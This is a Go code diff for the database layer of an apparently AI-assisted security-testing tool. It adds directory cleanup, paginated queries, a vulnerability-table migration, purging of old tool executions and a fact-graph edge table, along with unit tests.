if base := strings.TrimSpace(db.einoReductionRootDir); base != "" {
return base
}
return filepath.Join("tmp", "reduction")
}
func (db *DB) removeConversationScopedDirs(conversationID, projectID string) {
// summarization transcript, etc.
db.removeConversationScopedDir(db.conversationArtifactsDir, conversationID, "conversation_artifacts")
// Eino plantask JSON boards (skills_dir/.eino/plantask/<id>/).
db.removeConversationScopedDir(db.einoPlantaskBaseDir, conversationID, "plantask")
// Eino ADK runner checkpoints (checkpoint_dir/<id>/).
db.removeConversationScopedDir(db.einoCheckpointBaseDir, conversationID, "eino_checkpoint")
// Eino reduction persisted tool outputs (tmp/reduction/conversations/<id>/).
// Project-bound sessions share projects/<id>/ — skip on single conversation delete.
if strings.TrimSpace(projectID) == "" {
reductionBase := filepath.Join(db.einoReductionBaseDir(), "conversations")
db.removeConversationScopedDir(reductionBase, conversationID, "reduction")
}
}
func (db *DB) removeProjectScopedDirs(projectID string) {
// Eino reduction persisted tool outputs (tmp/reduction/projects/<id>/).
reductionBase := filepath.Join(db.einoReductionBaseDir(), "projects")
db.removeConversationScopedDir(reductionBase, projectID, "reduction")
} }
// SaveAgentTrace 保存最后一轮代理消息轨迹与助手输出摘要。 // SaveAgentTrace 保存最后一轮代理消息轨迹与助手输出摘要。
@@ -752,6 +835,62 @@ func (db *DB) GetMessages(conversationID string) ([]Message, error) {
return messages, nil return messages, nil
} }
// GetMessagesLite 获取对话消息(不含 reasoning_content),用于历史会话快速切换。
func (db *DB) GetMessagesLite(conversationID string) ([]Message, error) {
rows, err := db.Query(
"SELECT id, conversation_id, role, content, mcp_execution_ids, created_at, updated_at FROM messages WHERE conversation_id = ? ORDER BY created_at ASC, rowid ASC",
conversationID,
)
if err != nil {
return nil, fmt.Errorf("查询消息失败: %w", err)
}
defer rows.Close()
var messages []Message
for rows.Next() {
var msg Message
var mcpIDsJSON sql.NullString
var createdAt string
var updatedAt sql.NullString
if err := rows.Scan(&msg.ID, &msg.ConversationID, &msg.Role, &msg.Content, &mcpIDsJSON, &createdAt, &updatedAt); err != nil {
return nil, fmt.Errorf("扫描消息失败: %w", err)
}
var err error
msg.CreatedAt, err = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt)
if err != nil {
msg.CreatedAt, err = time.Parse("2006-01-02 15:04:05", createdAt)
}
if err != nil {
msg.CreatedAt, _ = time.Parse(time.RFC3339, createdAt)
}
if updatedAt.Valid && strings.TrimSpace(updatedAt.String) != "" {
msg.UpdatedAt, err = time.Parse("2006-01-02 15:04:05.999999999-07:00", updatedAt.String)
if err != nil {
msg.UpdatedAt, err = time.Parse("2006-01-02 15:04:05", updatedAt.String)
}
if err != nil {
msg.UpdatedAt, _ = time.Parse(time.RFC3339, updatedAt.String)
}
}
if msg.UpdatedAt.IsZero() {
msg.UpdatedAt = msg.CreatedAt
}
if mcpIDsJSON.Valid && mcpIDsJSON.String != "" {
if err := json.Unmarshal([]byte(mcpIDsJSON.String), &msg.MCPExecutionIDs); err != nil {
db.logger.Warn("解析MCP执行ID失败", zap.Error(err))
}
}
messages = append(messages, msg)
}
return messages, nil
}
// turnSliceRange 根据任意一条消息 ID 定位「一轮对话」在 msgs 中的 [start, end) 下标区间(msgs 须已按时间升序,与 GetMessages 一致)。 // turnSliceRange 根据任意一条消息 ID 定位「一轮对话」在 msgs 中的 [start, end) 下标区间(msgs 须已按时间升序,与 GetMessages 一致)。
// 一轮 = 从某条 user 消息起,至下一条 user 之前(含中间所有 assistant)。 // 一轮 = 从某条 user 消息起,至下一条 user 之前(含中间所有 assistant)。
func turnSliceRange(msgs []Message, anchorID string) (start, end int, err error) { func turnSliceRange(msgs []Message, anchorID string) (start, end int, err error) {
@@ -920,6 +1059,107 @@ func (db *DB) GetProcessDetails(messageID string) ([]ProcessDetail, error) {
return details, nil return details, nil
} }
// ProcessDetailsSummary 过程详情摘要(用于折叠态展示,避免全量加载)。
type ProcessDetailsSummary struct {
Total int `json:"total"`
IterationCount int `json:"iterationCount"`
MaxIteration int `json:"maxIteration"`
}
// GetProcessDetailsSummary 统计消息的过程详情数量与迭代轮次。
func (db *DB) GetProcessDetailsSummary(messageID string) (*ProcessDetailsSummary, error) {
var total int
if err := db.QueryRow(
"SELECT COUNT(*) FROM process_details WHERE message_id = ?",
messageID,
).Scan(&total); err != nil {
return nil, fmt.Errorf("统计过程详情失败: %w", err)
}
summary := &ProcessDetailsSummary{Total: total}
if total == 0 {
return summary, nil
}
rows, err := db.Query(
"SELECT data FROM process_details WHERE message_id = ? AND event_type = 'iteration' ORDER BY created_at ASC, rowid ASC",
messageID,
)
if err != nil {
return nil, fmt.Errorf("查询迭代详情失败: %w", err)
}
defer rows.Close()
maxIter := 0
iterCount := 0
for rows.Next() {
var dataJSON string
if err := rows.Scan(&dataJSON); err != nil {
return nil, fmt.Errorf("扫描迭代详情失败: %w", err)
}
iterCount++
if dataJSON == "" {
continue
}
var payload map[string]interface{}
if err := json.Unmarshal([]byte(dataJSON), &payload); err != nil {
continue
}
if n, ok := payload["iteration"].(float64); ok && int(n) > maxIter {
maxIter = int(n)
}
}
summary.IterationCount = iterCount
summary.MaxIteration = maxIter
return summary, nil
}
// GetProcessDetailsPage 分页获取消息的过程详情(按时间升序)。
func (db *DB) GetProcessDetailsPage(messageID string, limit, offset int) ([]ProcessDetail, int, error) {
var total int
if err := db.QueryRow(
"SELECT COUNT(*) FROM process_details WHERE message_id = ?",
messageID,
).Scan(&total); err != nil {
return nil, 0, fmt.Errorf("统计过程详情失败: %w", err)
}
if total == 0 || offset >= total {
return nil, total, nil
}
rows, err := db.Query(
"SELECT id, message_id, conversation_id, event_type, message, data, created_at FROM process_details WHERE message_id = ? ORDER BY created_at ASC, rowid ASC LIMIT ? OFFSET ?",
messageID, limit, offset,
)
if err != nil {
return nil, 0, fmt.Errorf("查询过程详情失败: %w", err)
}
defer rows.Close()
var details []ProcessDetail
for rows.Next() {
var detail ProcessDetail
var createdAt string
if err := rows.Scan(&detail.ID, &detail.MessageID, &detail.ConversationID, &detail.EventType, &detail.Message, &detail.Data, &createdAt); err != nil {
return nil, 0, fmt.Errorf("扫描过程详情失败: %w", err)
}
var parseErr error
detail.CreatedAt, parseErr = time.Parse("2006-01-02 15:04:05.999999999-07:00", createdAt)
if parseErr != nil {
detail.CreatedAt, parseErr = time.Parse("2006-01-02 15:04:05", createdAt)
}
if parseErr != nil {
detail.CreatedAt, _ = time.Parse(time.RFC3339, createdAt)
}
details = append(details, detail)
}
return details, total, nil
}
// GetProcessDetailsByConversation 获取对话的所有过程详情(按消息分组) // GetProcessDetailsByConversation 获取对话的所有过程详情(按消息分组)
func (db *DB) GetProcessDetailsByConversation(conversationID string) (map[string][]ProcessDetail, error) { func (db *DB) GetProcessDetailsByConversation(conversationID string) (map[string][]ProcessDetail, error) {
rows, err := db.Query( rows, err := db.Query(
@@ -0,0 +1,94 @@
package database
import (
"os"
"path/filepath"
"testing"
"go.uber.org/zap"
)
func TestDeleteConversationRemovesEinoScopedDirs(t *testing.T) {
tmp := t.TempDir()
dbPath := filepath.Join(tmp, "conversations.db")
db, err := NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatalf("NewDB: %v", err)
}
defer db.Close()
plantaskBase := filepath.Join(tmp, "skills", ".eino", "plantask")
checkpointBase := filepath.Join(tmp, "eino-checkpoints")
reductionBase := filepath.Join(tmp, "reduction")
db.SetEinoConversationDirs(plantaskBase, checkpointBase, reductionBase)
conv, err := db.CreateConversation("cleanup test", ConversationCreateMeta{})
if err != nil {
t.Fatalf("CreateConversation: %v", err)
}
convID := conv.ID
seg := sanitizeConversationPathSegment(convID)
for _, base := range []struct {
root string
file string
}{
{db.conversationArtifactsDir, "transcript.txt"},
{plantaskBase, "task-1.json"},
{checkpointBase, "runner-deep.ckpt"},
{filepath.Join(reductionBase, "conversations"), "tool-output.txt"},
} {
dir := filepath.Join(base.root, seg)
if err := os.MkdirAll(dir, 0o755); err != nil {
t.Fatalf("mkdir %s: %v", dir, err)
}
if err := os.WriteFile(filepath.Join(dir, base.file), []byte("x"), 0o644); err != nil {
t.Fatalf("write %s: %v", base.file, err)
}
}
if err := db.DeleteConversation(convID); err != nil {
t.Fatalf("DeleteConversation: %v", err)
}
for _, base := range []string{db.conversationArtifactsDir, plantaskBase, checkpointBase, filepath.Join(reductionBase, "conversations")} {
dir := filepath.Join(base, seg)
if _, statErr := os.Stat(dir); !os.IsNotExist(statErr) {
t.Fatalf("expected removed dir %s, stat err=%v", dir, statErr)
}
}
}
func TestDeleteProjectRemovesReductionDir(t *testing.T) {
tmp := t.TempDir()
dbPath := filepath.Join(tmp, "conversations.db")
db, err := NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatalf("NewDB: %v", err)
}
defer db.Close()
reductionBase := filepath.Join(tmp, "reduction")
db.SetEinoConversationDirs("", "", reductionBase)
project, err := db.CreateProject(&Project{Name: "cleanup test"})
if err != nil {
t.Fatalf("CreateProject: %v", err)
}
seg := sanitizeConversationPathSegment(project.ID)
reductionDir := filepath.Join(reductionBase, "projects", seg, "clear")
if err := os.MkdirAll(reductionDir, 0o755); err != nil {
t.Fatalf("mkdir %s: %v", reductionDir, err)
}
if err := os.WriteFile(filepath.Join(reductionDir, "call-1.txt"), []byte("x"), 0o644); err != nil {
t.Fatalf("write: %v", err)
}
if err := db.DeleteProject(project.ID); err != nil {
t.Fatalf("DeleteProject: %v", err)
}
projectReductionDir := filepath.Join(reductionBase, "projects", seg)
if _, statErr := os.Stat(projectReductionDir); !os.IsNotExist(statErr) {
t.Fatalf("expected removed dir %s, stat err=%v", projectReductionDir, statErr)
}
}
@@ -0,0 +1,69 @@
package database
import (
"path/filepath"
"testing"
"go.uber.org/zap"
)
func TestDeleteConversationPreservesVulnerabilities(t *testing.T) {
tmp := t.TempDir()
dbPath := filepath.Join(tmp, "vuln-preserve.db")
db, err := NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatalf("NewDB: %v", err)
}
defer db.Close()
conv, err := db.CreateConversation("vuln source chat", ConversationCreateMeta{})
if err != nil {
t.Fatalf("CreateConversation: %v", err)
}
vuln, err := db.CreateVulnerability(&Vulnerability{
ConversationID: conv.ID,
Title: "SQL Injection",
Severity: "high",
Status: "open",
})
if err != nil {
t.Fatalf("CreateVulnerability: %v", err)
}
if err := db.DeleteConversation(conv.ID); err != nil {
t.Fatalf("DeleteConversation: %v", err)
}
got, err := db.GetVulnerability(vuln.ID)
if err != nil {
t.Fatalf("GetVulnerability after delete: %v", err)
}
if got.Title != "SQL Injection" {
t.Fatalf("title = %q, want SQL Injection", got.Title)
}
if got.ConversationID != "" {
t.Fatalf("conversation_id = %q, want empty after conversation delete", got.ConversationID)
}
if got.ConversationTag != "vuln source chat" {
t.Fatalf("conversation_tag = %q, want vuln source chat", got.ConversationTag)
}
}
func TestMigrateVulnerabilitiesConversationFK(t *testing.T) {
tmp := t.TempDir()
dbPath := filepath.Join(tmp, "vuln-fk-migrate.db")
db, err := NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatalf("NewDB: %v", err)
}
defer db.Close()
ok, err := vulnerabilitiesConversationFKOnDeleteSetNull(db.DB)
if err != nil {
t.Fatalf("vulnerabilitiesConversationFKOnDeleteSetNull: %v", err)
}
if !ok {
t.Fatal("expected vulnerabilities.conversation_id FK to use ON DELETE SET NULL")
}
}
+154 -2
View File
@@ -49,6 +49,9 @@ type DB struct {
*sql.DB *sql.DB
logger *zap.Logger logger *zap.Logger
conversationArtifactsDir string conversationArtifactsDir string
einoPlantaskBaseDir string // skills_dir + plantask_rel_dir (per-conversation subdirs)
einoCheckpointBaseDir string // checkpoint_dir root (per-conversation subdirs)
einoReductionRootDir string // reduction_root_dir or default tmp/reduction (conversations/<id> subdirs)
checkpointLoopName string checkpointLoopName string
checkpointStop chan struct{} checkpointStop chan struct{}
checkpointDone chan struct{} checkpointDone chan struct{}
@@ -155,6 +158,18 @@ func NewDB(dbPath string, logger *zap.Logger) (*DB, error) {
return database, nil return database, nil
} }
// SetEinoConversationDirs configures best-effort filesystem cleanup on DeleteConversation.
// plantaskBase is skills_root/plantask_rel (no conversation id); checkpointBase is checkpoint_dir root.
// reductionRoot is reduction_root_dir from config; empty uses tmp/reduction (conversation-scoped subdirs only).
func (db *DB) SetEinoConversationDirs(plantaskBase, checkpointBase, reductionRoot string) {
if db == nil {
return
}
db.einoPlantaskBaseDir = strings.TrimSpace(plantaskBase)
db.einoCheckpointBaseDir = strings.TrimSpace(checkpointBase)
db.einoReductionRootDir = strings.TrimSpace(reductionRoot)
}
// initTables 初始化数据库表 // initTables 初始化数据库表
func (db *DB) initTables() error { func (db *DB) initTables() error {
// 创建对话表(last_react_input / last_react_output 存「代理消息轨迹」JSON 与助手摘要,列名保留以兼容已有库) // 创建对话表(last_react_input / last_react_output 存「代理消息轨迹」JSON 与助手摘要,列名保留以兼容已有库)
@@ -341,11 +356,27 @@ func (db *DB) initTables() error {
UNIQUE(project_id, fact_key) UNIQUE(project_id, fact_key)
);` );`
// 项目事实关系边(黑板 DAG
createProjectFactEdgesTable := `
CREATE TABLE IF NOT EXISTS project_fact_edges (
id TEXT PRIMARY KEY,
project_id TEXT NOT NULL,
source_fact_key TEXT NOT NULL,
target_fact_key TEXT NOT NULL,
edge_type TEXT NOT NULL,
confidence TEXT NOT NULL DEFAULT 'tentative',
source_conversation_id TEXT,
created_at DATETIME NOT NULL,
updated_at DATETIME NOT NULL,
FOREIGN KEY (project_id) REFERENCES projects(id) ON DELETE CASCADE,
UNIQUE(project_id, source_fact_key, target_fact_key, edge_type)
);`
// 创建漏洞表 // 创建漏洞表
createVulnerabilitiesTable := ` createVulnerabilitiesTable := `
CREATE TABLE IF NOT EXISTS vulnerabilities ( CREATE TABLE IF NOT EXISTS vulnerabilities (
id TEXT PRIMARY KEY, id TEXT PRIMARY KEY,
conversation_id TEXT NOT NULL, conversation_id TEXT,
conversation_tag TEXT, conversation_tag TEXT,
task_tag TEXT, task_tag TEXT,
title TEXT NOT NULL, title TEXT NOT NULL,
@@ -359,7 +390,8 @@ func (db *DB) initTables() error {
recommendation TEXT, recommendation TEXT,
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP, updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE CASCADE project_id TEXT,
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE SET NULL
);` );`
// 创建批量任务队列表 // 创建批量任务队列表
@@ -578,6 +610,9 @@ func (db *DB) initTables() error {
CREATE INDEX IF NOT EXISTS idx_project_facts_project_id ON project_facts(project_id); CREATE INDEX IF NOT EXISTS idx_project_facts_project_id ON project_facts(project_id);
CREATE INDEX IF NOT EXISTS idx_project_facts_confidence ON project_facts(confidence); CREATE INDEX IF NOT EXISTS idx_project_facts_confidence ON project_facts(confidence);
CREATE INDEX IF NOT EXISTS idx_project_facts_related_vuln ON project_facts(related_vulnerability_id); CREATE INDEX IF NOT EXISTS idx_project_facts_related_vuln ON project_facts(related_vulnerability_id);
CREATE INDEX IF NOT EXISTS idx_project_fact_edges_project ON project_fact_edges(project_id);
CREATE INDEX IF NOT EXISTS idx_project_fact_edges_source ON project_fact_edges(project_id, source_fact_key);
CREATE INDEX IF NOT EXISTS idx_project_fact_edges_target ON project_fact_edges(project_id, target_fact_key);
CREATE INDEX IF NOT EXISTS idx_conversations_project_id ON conversations(project_id); CREATE INDEX IF NOT EXISTS idx_conversations_project_id ON conversations(project_id);
CREATE INDEX IF NOT EXISTS idx_vulnerabilities_project_id ON vulnerabilities(project_id); CREATE INDEX IF NOT EXISTS idx_vulnerabilities_project_id ON vulnerabilities(project_id);
CREATE INDEX IF NOT EXISTS idx_batch_tasks_queue_id ON batch_tasks(queue_id); CREATE INDEX IF NOT EXISTS idx_batch_tasks_queue_id ON batch_tasks(queue_id);
@@ -659,6 +694,10 @@ func (db *DB) initTables() error {
return fmt.Errorf("创建project_facts表失败: %w", err) return fmt.Errorf("创建project_facts表失败: %w", err)
} }
if _, err := db.Exec(createProjectFactEdgesTable); err != nil {
return fmt.Errorf("创建project_fact_edges表失败: %w", err)
}
if _, err := db.Exec(createVulnerabilitiesTable); err != nil { if _, err := db.Exec(createVulnerabilitiesTable); err != nil {
return fmt.Errorf("创建vulnerabilities表失败: %w", err) return fmt.Errorf("创建vulnerabilities表失败: %w", err)
} }
@@ -725,6 +764,9 @@ func (db *DB) initTables() error {
db.logger.Warn("迁移vulnerabilities表失败", zap.Error(err)) db.logger.Warn("迁移vulnerabilities表失败", zap.Error(err))
// 不返回错误,允许继续运行 // 不返回错误,允许继续运行
} }
if err := db.migrateVulnerabilitiesConversationFK(); err != nil {
db.logger.Warn("迁移vulnerabilities会话外键失败", zap.Error(err))
}
if err := db.migrateProjectsTable(); err != nil { if err := db.migrateProjectsTable(); err != nil {
db.logger.Warn("迁移projects相关表失败", zap.Error(err)) db.logger.Warn("迁移projects相关表失败", zap.Error(err))
@@ -1134,6 +1176,116 @@ func (db *DB) dropProjectFactVersionsTable() error {
return err return err
} }
// migrateVulnerabilitiesConversationFK 将 vulnerabilities.conversation_id 外键改为 ON DELETE SET NULL,删除对话时保留漏洞记录。
func (db *DB) migrateVulnerabilitiesConversationFK() error {
ok, err := vulnerabilitiesConversationFKOnDeleteSetNull(db.DB)
if err != nil {
return err
}
if ok {
return nil
}
tx, err := db.Begin()
if err != nil {
return fmt.Errorf("开启事务失败: %w", err)
}
defer func() { _ = tx.Rollback() }()
const createNew = `
CREATE TABLE vulnerabilities_new (
id TEXT PRIMARY KEY,
conversation_id TEXT,
conversation_tag TEXT,
task_tag TEXT,
title TEXT NOT NULL,
description TEXT,
severity TEXT NOT NULL,
status TEXT NOT NULL DEFAULT 'open',
vulnerability_type TEXT,
target TEXT,
proof TEXT,
impact TEXT,
recommendation TEXT,
created_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
project_id TEXT,
FOREIGN KEY (conversation_id) REFERENCES conversations(id) ON DELETE SET NULL
);`
if _, err := tx.Exec(createNew); err != nil {
return fmt.Errorf("创建 vulnerabilities_new 失败: %w", err)
}
const copyRows = `
INSERT INTO vulnerabilities_new (
id, conversation_id, conversation_tag, task_tag, title, description,
severity, status, vulnerability_type, target, proof, impact, recommendation,
created_at, updated_at, project_id
)
SELECT
id, conversation_id, conversation_tag, task_tag, title, description,
severity, status, vulnerability_type, target, proof, impact, recommendation,
created_at, updated_at, project_id
FROM vulnerabilities;`
if _, err := tx.Exec(copyRows); err != nil {
return fmt.Errorf("复制 vulnerabilities 数据失败: %w", err)
}
if _, err := tx.Exec(`DROP TABLE vulnerabilities`); err != nil {
return fmt.Errorf("删除旧 vulnerabilities 表失败: %w", err)
}
if _, err := tx.Exec(`ALTER TABLE vulnerabilities_new RENAME TO vulnerabilities`); err != nil {
return fmt.Errorf("重命名 vulnerabilities 表失败: %w", err)
}
indexes := []string{
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_id ON vulnerabilities(conversation_id)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_conversation_tag ON vulnerabilities(conversation_tag)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_task_tag ON vulnerabilities(task_tag)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_severity ON vulnerabilities(severity)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_status ON vulnerabilities(status)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_created_at ON vulnerabilities(created_at)`,
`CREATE INDEX IF NOT EXISTS idx_vulnerabilities_project_id ON vulnerabilities(project_id)`,
}
for _, stmt := range indexes {
if _, err := tx.Exec(stmt); err != nil {
return fmt.Errorf("重建 vulnerabilities 索引失败: %w", err)
}
}
if err := tx.Commit(); err != nil {
return fmt.Errorf("提交 vulnerabilities 外键迁移失败: %w", err)
}
db.logger.Info("vulnerabilities 表已迁移:删除对话时保留漏洞记录")
return nil
}
func vulnerabilitiesConversationFKOnDeleteSetNull(db *sql.DB) (bool, error) {
rows, err := db.Query(`PRAGMA foreign_key_list(vulnerabilities)`)
if err != nil {
return false, err
}
defer rows.Close()
found := false
for rows.Next() {
var id, seq int
var table, from, to, onUpdate, onDelete, match string
if err := rows.Scan(&id, &seq, &table, &from, &to, &onUpdate, &onDelete, &match); err != nil {
return false, err
}
if from == "conversation_id" {
found = true
if !strings.EqualFold(onDelete, "SET NULL") {
return false, nil
}
}
}
if err := rows.Err(); err != nil {
return false, err
}
return found, nil
}
// migrateVulnerabilitiesTable 迁移 vulnerabilities 表,补充标签字段 // migrateVulnerabilitiesTable 迁移 vulnerabilities 表,补充标签字段
func (db *DB) migrateVulnerabilitiesTable() error { func (db *DB) migrateVulnerabilitiesTable() error {
columns := []struct { columns := []struct {
+87
View File
@@ -72,6 +72,23 @@ func (db *DB) SaveToolExecution(exec *mcp.ToolExecution) error {
return nil return nil
} }
// UpdateToolExecutionResult 仅更新结果字段(用于 reduction 后将监控展示与模型上下文对齐)。
func (db *DB) UpdateToolExecutionResult(id string, result *mcp.ToolResult) error {
id = strings.TrimSpace(id)
if id == "" || result == nil {
return nil
}
resultBytes, err := json.Marshal(result)
if err != nil {
return err
}
_, err = db.Exec(`UPDATE tool_executions SET result = ? WHERE id = ?`, string(resultBytes), id)
if err != nil {
db.logger.Warn("更新工具执行结果失败", zap.Error(err), zap.String("executionId", id))
}
return err
}
// CountToolExecutions 统计工具执行记录总数 // CountToolExecutions 统计工具执行记录总数
func (db *DB) CountToolExecutions(status, toolName string) (int, error) { func (db *DB) CountToolExecutions(status, toolName string) (int, error) {
query := `SELECT COUNT(*) FROM tool_executions` query := `SELECT COUNT(*) FROM tool_executions`
@@ -393,6 +410,76 @@ func (db *DB) GetToolExecutionsByIds(ids []string) ([]*mcp.ToolExecution, error)
return executions, nil return executions, nil
} }
type toolExecutionStatDelta struct {
totalCalls int
successCalls int
failedCalls int
}
// PurgeToolExecutionsBefore deletes executions older than cutoff and adjusts tool_stats.
func (db *DB) PurgeToolExecutionsBefore(cutoff time.Time) (int64, error) {
query := `
SELECT tool_name, status, COUNT(*) AS cnt
FROM tool_executions
WHERE ` + sqliteEpochGE("start_time", "<") + `
GROUP BY tool_name, status
`
rows, err := db.Query(query, formatSQLiteUTC(cutoff))
if err != nil {
return 0, err
}
defer rows.Close()
deltas := make(map[string]*toolExecutionStatDelta)
for rows.Next() {
var toolName, status string
var count int
if err := rows.Scan(&toolName, &status, &count); err != nil {
db.logger.Warn("读取待清理执行记录统计失败", zap.Error(err))
continue
}
toolName = strings.TrimSpace(toolName)
if toolName == "" || count <= 0 {
continue
}
delta := deltas[toolName]
if delta == nil {
delta = &toolExecutionStatDelta{}
deltas[toolName] = delta
}
delta.totalCalls += count
switch status {
case "failed", "cancelled":
delta.failedCalls += count
case "completed":
delta.successCalls += count
}
}
if err := rows.Err(); err != nil {
return 0, err
}
res, err := db.Exec(`DELETE FROM tool_executions WHERE `+sqliteEpochGE("start_time", "<"), formatSQLiteUTC(cutoff))
if err != nil {
return 0, err
}
deleted, err := res.RowsAffected()
if err != nil {
return 0, err
}
for toolName, delta := range deltas {
if err := db.DecreaseToolStats(toolName, delta.totalCalls, delta.successCalls, delta.failedCalls); err != nil {
db.logger.Warn("清理过期执行记录后更新统计失败",
zap.Error(err),
zap.String("toolName", toolName),
)
}
}
return deleted, nil
}
// SaveToolStats 保存工具统计信息 // SaveToolStats 保存工具统计信息
func (db *DB) SaveToolStats(toolName string, stats *mcp.ToolStats) error { func (db *DB) SaveToolStats(toolName string, stats *mcp.ToolStats) error {
var lastCallTime sql.NullTime var lastCallTime sql.NullTime
+122
View File
@@ -0,0 +1,122 @@
package database
import (
"path/filepath"
"testing"
"time"
"cyberstrike-ai/internal/mcp"
"go.uber.org/zap"
)
func TestPurgeToolExecutionsBefore(t *testing.T) {
dbPath := filepath.Join(t.TempDir(), "monitor.db")
db, err := NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatalf("NewDB: %v", err)
}
defer db.Close()
oldStart := time.Now().AddDate(0, 0, -100)
newStart := time.Now().AddDate(0, 0, -1)
oldExec := &mcp.ToolExecution{
ID: "old-completed",
ToolName: "nmap::scan",
Arguments: map[string]interface{}{"target": "127.0.0.1"},
Status: "completed",
StartTime: oldStart,
}
oldFailed := &mcp.ToolExecution{
ID: "old-failed",
ToolName: "nmap::scan",
Arguments: map[string]interface{}{"target": "127.0.0.1"},
Status: "failed",
Error: "timeout",
StartTime: oldStart,
}
newExec := &mcp.ToolExecution{
ID: "new-completed",
ToolName: "nmap::scan",
Arguments: map[string]interface{}{"target": "127.0.0.1"},
Status: "completed",
StartTime: newStart,
}
for _, exec := range []*mcp.ToolExecution{oldExec, oldFailed, newExec} {
if err := db.SaveToolExecution(exec); err != nil {
t.Fatalf("SaveToolExecution(%s): %v", exec.ID, err)
}
}
if err := db.UpdateToolStats("nmap::scan", 3, 2, 1, &newStart); err != nil {
t.Fatalf("UpdateToolStats: %v", err)
}
cutoff := time.Now().AddDate(0, 0, -90)
deleted, err := db.PurgeToolExecutionsBefore(cutoff)
if err != nil {
t.Fatalf("PurgeToolExecutionsBefore: %v", err)
}
if deleted != 2 {
t.Fatalf("deleted = %d, want 2", deleted)
}
if _, err := db.GetToolExecution("old-completed"); err == nil {
t.Fatal("old-completed should be deleted")
}
if _, err := db.GetToolExecution("old-failed"); err == nil {
t.Fatal("old-failed should be deleted")
}
if _, err := db.GetToolExecution("new-completed"); err != nil {
t.Fatalf("new-completed should remain: %v", err)
}
stats, err := db.LoadToolStats()
if err != nil {
t.Fatalf("LoadToolStats: %v", err)
}
stat := stats["nmap::scan"]
if stat == nil {
t.Fatal("expected stats for nmap::scan")
}
if stat.TotalCalls != 1 || stat.SuccessCalls != 1 || stat.FailedCalls != 0 {
t.Fatalf("stats after purge = %+v, want total=1 success=1 failed=0", stat)
}
total, err := db.CountToolExecutions("", "")
if err != nil {
t.Fatalf("CountToolExecutions: %v", err)
}
if total != 1 {
t.Fatalf("remaining executions = %d, want 1", total)
}
}
func TestPurgeToolExecutionsBefore_zeroRetentionSkipsViaService(t *testing.T) {
// RetentionDaysEffective: 0 means no purge at service layer; DB method still works when called directly.
dbPath := filepath.Join(t.TempDir(), "monitor.db")
db, err := NewDB(dbPath, zap.NewNop())
if err != nil {
t.Fatalf("NewDB: %v", err)
}
defer db.Close()
exec := &mcp.ToolExecution{
ID: "ancient",
ToolName: "curl::get",
Arguments: map[string]interface{}{},
Status: "completed",
StartTime: time.Now().AddDate(-1, 0, 0),
}
if err := db.SaveToolExecution(exec); err != nil {
t.Fatalf("SaveToolExecution: %v", err)
}
deleted, err := db.PurgeToolExecutionsBefore(time.Now())
if err != nil {
t.Fatalf("PurgeToolExecutionsBefore: %v", err)
}
if deleted != 1 {
t.Fatalf("deleted = %d, want 1", deleted)
}
}
+12 -4
View File
@@ -195,6 +195,7 @@ func (db *DB) DeleteProject(id string) error {
if err != nil { if err != nil {
return fmt.Errorf("删除项目失败: %w", err) return fmt.Errorf("删除项目失败: %w", err)
} }
db.removeProjectScopedDirs(id)
return nil return nil
} }
@@ -389,7 +390,7 @@ func (db *DB) UpsertProjectFact(f *ProjectFact) (*ProjectFact, error) {
return f, nil return f, nil
} }
// DeprecateProjectFact 将事实标记为 deprecated。 // DeprecateProjectFact 将事实标记为 deprecated(关联边同步 deprecated
func (db *DB) DeprecateProjectFact(projectID, factKey string) error { func (db *DB) DeprecateProjectFact(projectID, factKey string) error {
res, err := db.Exec( res, err := db.Exec(
`UPDATE project_facts SET confidence = 'deprecated', updated_at = ? WHERE project_id = ? AND fact_key = ?`, `UPDATE project_facts SET confidence = 'deprecated', updated_at = ? WHERE project_id = ? AND fact_key = ?`,
@@ -402,7 +403,7 @@ func (db *DB) DeprecateProjectFact(projectID, factKey string) error {
if n == 0 { if n == 0 {
return fmt.Errorf("事实不存在") return fmt.Errorf("事实不存在")
} }
return nil return db.DeprecateProjectFactEdgesForKey(projectID, factKey)
} }
// RestoreProjectFact 将已废弃事实恢复为 tentative 或 confirmed(重新参与黑板索引)。 // RestoreProjectFact 将已废弃事实恢复为 tentative 或 confirmed(重新参与黑板索引)。
@@ -430,9 +431,16 @@ func (db *DB) RestoreProjectFact(projectID, factKey, confidence string) error {
return err return err
} }
// DeleteProjectFact 删除事实。 // DeleteProjectFact 删除事实(级联删除相关边)
func (db *DB) DeleteProjectFact(id string) error { func (db *DB) DeleteProjectFact(id string) error {
_, err := db.Exec(`DELETE FROM project_facts WHERE id = ?`, id) f, err := db.GetProjectFact(id)
if err != nil {
return err
}
if err := db.DeleteProjectFactEdgesForKey(f.ProjectID, f.FactKey); err != nil {
return err
}
_, err = db.Exec(`DELETE FROM project_facts WHERE id = ?`, id)
return err return err
} }
+410
View File
@@ -0,0 +1,410 @@
package database
import (
"database/sql"
"fmt"
"strings"
"time"
"github.com/google/uuid"
)
// ValidProjectFactEdgeTypes 项目事实图允许的边类型。
var ValidProjectFactEdgeTypes = map[string]struct{}{
"depends_on": {},
"leads_to": {},
"enables": {},
"exploits": {},
"discovered_on": {},
"contains": {},
"part_of": {},
"supports": {},
}
// ProjectFactEdge 项目事实关系边(source → target)。
type ProjectFactEdge struct {
ID string `json:"id"`
ProjectID string `json:"project_id"`
SourceFactKey string `json:"source_fact_key"`
TargetFactKey string `json:"target_fact_key"`
EdgeType string `json:"edge_type"`
Confidence string `json:"confidence"` // confirmed | tentative | deprecated
